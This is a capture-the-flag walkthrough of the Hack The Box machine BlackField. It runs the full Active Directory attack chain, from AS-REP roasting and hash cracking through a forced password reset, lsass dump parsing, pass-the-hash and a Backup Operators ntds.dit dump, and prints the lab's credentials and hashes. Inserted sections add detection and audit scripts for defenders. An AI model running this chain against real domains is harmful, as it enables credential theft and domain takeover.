Dark_Man
HTB - BlackField


Last updated 10 months ago

Machine Info

Blackfield is a hard difficulty Windows machine featuring Windows and Active Directory misconfigurations. Anonymous / Guest access to an SMB share is used to enumerate users. One user is found to have Kerberos pre-authentication disabled, which allows us to conduct an ASREPRoasting attack. This lets us retrieve a hash of the encrypted material contained in the AS-REP, which can be subjected to an offline brute-force attack in order to recover the plaintext password. With this user we can access an SMB share containing forensics artefacts, including an lsass process dump. This contains a username and a password for a user with WinRM privileges, who is also a member of the Backup Operators group. The privileges conferred by this privileged group are used to dump the Active Directory database and retrieve the hash of the primary domain administrator.

Enumeration

Scope

IP Address: 10.10.10.192

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE        REASON
53/tcp   open  domain         syn-ack
88/tcp   open  kerberos-sec   syn-ack
135/tcp  open  msrpc          syn-ack
389/tcp  open  ldap           syn-ack
445/tcp  open  microsoft-ds   syn-ack
593/tcp  open  http-rpc-epmap syn-ack
3268/tcp open  globalcatLDAP  syn-ack
5985/tcp open  wsman          syn-ack


┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p53,88,135,389,445,593,3268,5985 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-12 23:31:40Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m02s
| smb2-time: 
|   date: 2024-07-12T23:31:51
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
* Open ports: 53,88,135,389,445,593,3268,5985
* Services: DNS - KERBEROS - RPC - SMB - winRM
* Important Notes: Domain: BLACKFIELD.local

RPC Enumeration

SMB Enumeration

When I connected to the SMB server with an anonymous login, it failed.

However, when I attempted to authenticate with the guest account, I got a hit.

smbclient shows the same results too.

I mounted the share on my Kali machine to explore it easily.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ sudo mount -t cifs "\\\\$ip\\profiles$" ./mount
Password for root@\\10.10.10.192\profiles$:

The folders are named after people, so they are probably users' home directories. I will add these names to a list and test them against Kerberos to find valid usernames.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ ls mount | tee -a users.lst

<snip>

Kerberos Enumeration

I found three valid users with kerbrute.

When I attempted an ASREP-Roasting attack against these users, I got a hash for the user support.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ impacket-GetNPUsers BLACKFIELD.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.txt
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:30c1b9d2109600c3ebb0e38fb20ab14d$4473af423266d56382e57fc031bae65483b913e45c4a0efcf25fb62008518a2a385360f1d5a5bdd1cec5adb730154b1108bf3739f84ea86e3d4d62fe0ba6d1bcf74e09831c8d5ecc2aa0135f848d34a3e6e961a6faecb4b74298262263c9184ffc5aa4b9ae0f81330e08915a1892ebc53551bd39e1040a6218f0cd4e580483fb3c584b60dda863a39134a4cfa4eb573c5dfabebcc54120404f33169419086a3ae31382ebd3b05c29e3e525459991fcfc9a65d4cc764b6e7a714a0a39616f794884dd1eee275ceb091ce8bc4f2a1de7a0cdeb43b418d03a706dd3b3a9d3d70353fc94e9084892e3a038c711c395430c1dcf3277b9
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt

$krb5asrep$23$support@BLACKFIELD.LOCAL:30c1b9d2109600c3ebb0e38fb20ab14d$4473af423266d56382e57fc031bae65483b913e45c4a0efcf25fb62008518a2a385360f1d5a5bdd1cec5adb730154b1108bf3739f84ea86e3d4d62fe0ba6d1bcf74e09831c8d5ecc2aa0135f848d34a3e6e961a6faecb4b74298262263c9184ffc5aa4b9ae0f81330e08915a1892ebc53551bd39e1040a6218f0cd4e580483fb3c584b60dda863a39134a4cfa4eb573c5dfabebcc54120404f33169419086a3ae31382ebd3b05c29e3e525459991fcfc9a65d4cc764b6e7a714a0a39616f794884dd1eee275ceb091ce8bc4f2a1de7a0cdeb43b418d03a706dd3b3a9d3d70353fc94e9084892e3a038c711c395430c1dcf3277b9:#00^BlackKnight

Session..........: hashcat
Status...........: Cracked

Initial Access

Confirm the credentials we got

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u support -p '#00^BlackKnight'

SMB     10.10.10.192    445    DC01    [+] BLACKFIELD.local\support:#00^BlackKnight

List shares that support has access to

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u support -p '#00^BlackKnight' --shares                                                                   
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight                                    
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark                                          
SMB         10.10.10.192    445    DC01             -----           -----------     ------                                          
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin                                    
SMB         10.10.10.192    445    DC01             C$                              Default share                                   
SMB         10.10.10.192    445    DC01             forensic                        Forensic / Audit share.                         
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC                                      
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share                              
SMB         10.10.10.192    445    DC01             profiles$       READ
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share 
  • I couldn't find any interesting files even though I had valid credentials, so I will continue enumeration with bloodhound.py

Enumerate the domain with bloodhound.py and feed the zip file to bloodhound GUI

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ bloodhound-python -u 'support' -p '#00^BlackKnight' -ns $ip -d blackfield.local -c all

Looking at BloodHound, I found that support can change the password of audit2020 (a ForceChangePassword edge).

I gave BloodHound a custom query to see which users can PSRemote to the machine:

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

I searched for a way to change a user's password remotely, without access to the machine, and found this command in this post: https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ rpcclient -U "support%#00^BlackKnight" $ip

rpcclient $> setuserinfo
Usage: setuserinfo username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo audit2020 23 P@ssword123!
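Both the ASREP-Roasting step above and the password reset just performed leave a clear trace in the domain controller's Security log, so here is the defender's side of these two steps as an added example (not part of the original write-up): Event ID 4768 records every TGT request, including the pre-authentication type and the etype of the issued ticket, and Event ID 4724 records a password reset performed on another account. The events below are constructed samples in a flattened JSON form; the source address 10.10.14.5 and the helpdesk01 account are made up for the example.

```python
"""
Domain-controller Security log triage for the signals left by AS-REP roasting
(Event ID 4768) and by a forced password reset (Event ID 4724).
Sample events are constructed; they are not real log data.
"""
from collections import defaultdict

RC4_HMAC = "0x17"                  # etype 23, the "23" in $krb5asrep$23$
KDC_ERR_PREAUTH_REQUIRED = "0x19"  # answer for an account that still requires pre-auth

SAMPLE_EVENTS = [
    # Normal TGT request: pre-auth type 2 (encrypted timestamp), AES256 etype.
    {"EventID": 4768, "TargetUserName": "svc_backup", "IpAddress": "10.10.10.192",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    # A user list being tried from one host: accounts that need pre-auth answer 0x19.
    {"EventID": 4768, "TargetUserName": "svc_backup", "IpAddress": "10.10.14.5",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "Status": "0x19"},
    {"EventID": 4768, "TargetUserName": "audit2020", "IpAddress": "10.10.14.5",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "Status": "0x19"},
    # The roastable account: TGT issued with no pre-auth and an RC4 etype.
    {"EventID": 4768, "TargetUserName": "support", "IpAddress": "10.10.14.5",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    # Password events: a self-service change (4723), a helpdesk reset, the abuse.
    {"EventID": 4723, "SubjectUserName": "jdoe", "TargetUserName": "jdoe"},
    {"EventID": 4724, "SubjectUserName": "helpdesk01", "TargetUserName": "jdoe"},
    {"EventID": 4724, "SubjectUserName": "support", "TargetUserName": "audit2020"},
]


def roastable_tgt_requests(events):
    """TGTs issued without pre-authentication: each one is an AS-REP an attacker
    can crack offline. Returns (user, source ip, etype, is_rc4); RC4 makes the
    offline crack cheap (hashcat mode 18200 in the write-up)."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4768 or ev.get("Status") != "0x0":
            continue
        if ev.get("PreAuthType") != "0":
            continue
        etype = ev.get("TicketEncryptionType", "")
        hits.append((ev["TargetUserName"], ev["IpAddress"], etype, etype == RC4_HMAC))
    return hits


def preauth_probe_sources(events, min_distinct_users=2):
    """Sources that collected KDC_ERR_PREAUTH_REQUIRED for several different
    names: the pattern a tool iterating a user list leaves behind."""
    by_ip = defaultdict(set)
    for ev in events:
        if ev.get("EventID") == 4768 and ev.get("Status") == KDC_ERR_PREAUTH_REQUIRED:
            by_ip[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: sorted(users) for ip, users in by_ip.items()
            if len(users) >= min_distinct_users}


def suspicious_password_resets(events, authorised_resetters):
    """4724 resets of someone else's account by a subject that is neither an
    authorised resetter (helpdesk/admin accounts) nor a machine account."""
    allowed = {a.lower() for a in authorised_resetters}
    hits = []
    for ev in events:
        if ev.get("EventID") != 4724:
            continue
        subject, target = ev["SubjectUserName"], ev["TargetUserName"]
        if subject == target or subject.endswith("$") or subject.lower() in allowed:
            continue
        hits.append((subject, target))
    return hits


if __name__ == "__main__":
    for hit in roastable_tgt_requests(SAMPLE_EVENTS):
        print("AS-REP roastable TGT:", hit)
    for ip, users in preauth_probe_sources(SAMPLE_EVENTS).items():
        print("pre-auth probing from", ip, "against", users)
    for subject, target in suspicious_password_resets(SAMPLE_EVENTS, {"helpdesk01"}):
        print("password reset by", subject, "on", target)
```

On the sample, the only roastable TGT is the one for support (RC4), the failed 0x19 lookups for svc_backup and audit2020 all come from the same source, and the reset of audit2020 by support is the one 4724 that no helpdesk allowlist explains; the same three checks run unchanged over a real 4768/4724 export.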

I managed to change the user's password, but I still don't have access to the machine, so I will enumerate the shares again as audit2020.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u audit2020 -p 'P@ssword123!'                              
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:P@ssword123! 

I got read access to the forensic share with the user audit2020.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u audit2020 -p 'P@ssword123!' --shares

SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:P@ssword123! 
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic        READ            Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.10.192    445    DC01             profiles$       READ            
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share 

I will mount the share on my Kali machine and start navigating it.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ sudo mount -t cifs "\\\\$ip\\forensic" ./mount -o "username=audit2020,password=P@ssword123\!" 
[sudo] password for kali: 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ ls mount         
commands_output  memory_analysis  tools

These two directories look interesting, and the lsass.zip file is the most important file here.

Zip file content:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ unzip -l lsass.zip                               
Archive:  lsass.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
143044222  2020-02-23 11:02   lsass.DMP
---------                     -------
143044222                     1 file

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ unzip lsass.zip   
Archive:  lsass.zip
  inflating: lsass.DMP

I will extract secrets from this memory dump with pypykatz, which is like mimikatz but runs on Linux.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ pypykatz lsa minidump ./lsass.DMP

FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
        == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 9658d1d1dcd9250115e2205d9f48400d
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
                DPAPI: a03cd8e9d30171f3cfe8caad92fef621

<snip>

== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
        == MSV ==
                Username: Administrator
                Domain: BLACKFIELD
                LM: NA
                NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
                SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
                DPAPI: 240339f898b6ac4ce3f34702e4a8955

<snip>

I tried to authenticate with the NT hashes for svc_backup and Administrator. I got a hit with svc_backup but not with Administrator.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d     

SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62

SMB         10.10.10.192    445    DC01             [-] BLACKFIELD.local\administrator:7f1e4ff8c6a8e6b6fcae2d9c0572cd62 STATUS_LOGON_FAILURE 

We know from BloodHound that we can PSRemote to the machine with the svc_backup account, so I will start evil-winrm.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ evil-winrm -i $ip -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

*Evil-WinRM* PS C:\Users\svc_backup\Documents> type ..\Desktop\user.txt
3920bb317a0bef51xxxxxxxxxxxxxxxx

User Flag: 3920bb317a0bef51xxxxxxxxxxxxxxxx

Privilege Escalation

svc_backup is a member of the privileged group Backup Operators, which can be abused to obtain Domain Admin privileges.
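The whole chain on this box rests on two account settings: Kerberos pre-authentication disabled on support, and svc_backup sitting in Backup Operators while also being allowed to PSRemote to the DC. As an added example (not part of the original write-up), here is an audit that flags both from an account export: the userAccountControl bit DONT_REQ_PREAUTH, membership of the built-in operator groups, and the combination of an operator group with a remote-access group. The account records are constructed in the shape of a flattened LDAP export (sAMAccountName, userAccountControl, memberOf); the DNs, the userAccountControl values and the choice of remote-access groups are assumptions, not data from the box.

```python
"""
Audit of account-level misconfigurations in a constructed AD account export:
pre-auth disabled, operator-group membership, operator group + remote access.
"""
ACCOUNTDISABLE = 0x0002
PASSWD_NOTREQD = 0x0020
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000          # UF_DONT_REQUIRE_PREAUTH, the flag GetNPUsers looks for

# Built-in groups whose rights on a domain controller are domain-admin equivalent
# in practice (Backup Operators: SeBackupPrivilege, enough to copy ntds.dit).
OPERATOR_GROUPS = {"Backup Operators", "Server Operators", "Account Operators", "Print Operators"}
# Groups that give an interactive path to the DC (assumed; adjust to the environment).
REMOTE_ACCESS_GROUPS = {"Remote Management Users", "Remote Desktop Users"}

# Constructed sample export; flag values and DNs are assumptions.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "support", "userAccountControl": 0x410200,
     "memberOf": ["CN=Domain Users,CN=Users,DC=BLACKFIELD,DC=local"]},
    {"sAMAccountName": "audit2020", "userAccountControl": 0x200,
     "memberOf": ["CN=Domain Users,CN=Users,DC=BLACKFIELD,DC=local"]},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x10200,
     "memberOf": ["CN=Backup Operators,CN=Builtin,DC=BLACKFIELD,DC=local",
                  "CN=Remote Management Users,CN=Builtin,DC=BLACKFIELD,DC=local"]},
    {"sAMAccountName": "krbtgt", "userAccountControl": 0x202,    # disabled: skipped
     "memberOf": []},
]


def cn_of(dn):
    """First RDN value of a DN: 'CN=Backup Operators,CN=Builtin,...' -> 'Backup Operators'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def decode_uac(uac):
    """Names of the userAccountControl bits this audit cares about."""
    names = {ACCOUNTDISABLE: "ACCOUNTDISABLE", PASSWD_NOTREQD: "PASSWD_NOTREQD",
             DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD", DONT_REQ_PREAUTH: "DONT_REQ_PREAUTH"}
    return sorted(name for bit, name in names.items() if uac & bit)


def audit_accounts(accounts):
    """Return (account, finding) pairs for enabled accounts."""
    findings = []
    for acct in accounts:
        name = acct["sAMAccountName"]
        uac = int(acct["userAccountControl"])
        if uac & ACCOUNTDISABLE:
            continue
        if uac & DONT_REQ_PREAUTH:
            findings.append((name, "kerberos-preauth-disabled"))
        if uac & PASSWD_NOTREQD:
            findings.append((name, "password-not-required"))
        groups = {cn_of(dn) for dn in acct.get("memberOf", [])}
        for group in sorted(groups & OPERATOR_GROUPS):
            findings.append((name, "member-of:" + group))
        if groups & OPERATOR_GROUPS and groups & REMOTE_ACCESS_GROUPS:
            findings.append((name, "operator-group-with-remote-access"))
    return findings


if __name__ == "__main__":
    for acct in SAMPLE_ACCOUNTS:
        print(acct["sAMAccountName"], decode_uac(acct["userAccountControl"]))
    for name, finding in audit_accounts(SAMPLE_ACCOUNTS):
        print("FINDING", name, finding)
```

On the sample this reports support for disabled pre-authentication and svc_backup twice, once for Backup Operators membership and once because that membership is paired with a remote-access group; a real export would come from ldapsearch or Get-ADUser with the same three attributes.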

I will create a shadow copy of the C: volume with diskshadow.exe so that ntds.dit can be copied from it. Create this file (vss.dsh), which contains the commands for the diskshadow utility:

set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
exit

I ran into an issue when running diskshadow, so I asked the community; the problem was the file's line endings (diskshadow expects Windows CRLF line endings), which can be fixed with this command:

unix2dos vss.dsh

Create a shadow copy

*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s .\vss.dsh
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  7/12/2024 7:46:57 PM

-> set verbose on
-> set metadata C:\Windows\Temp\meta.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create

The shadow copy was successfully exposed as E:\.
-> end backup
-> exit

Copy the database file to current directory

*Evil-WinRM* PS C:\Users\svc_backup\Documents> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit .\ntds.dit

Get the SYSTEM hive, which we need to decrypt the database

*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save HKLM\SYSTEM SYSTEM.SAV

Dump the secrets from the database

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM.SAV  LOCAL                                                                                                                                                                           
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480bxxxxxxxxxxxxxxx:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:a6504030ea199802f249588cdcabfab1:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c5f2d015f316018f6405522825689ffe:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ evil-winrm -i $ip -u administrator -H 184fb5e5178480bexxxxxxxxxxxx         

*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
4375a629c7c67c8e29dxxxxxxxxxxxx

Root Flag: 4375a629c7c67c8exxxxxxxxxxxx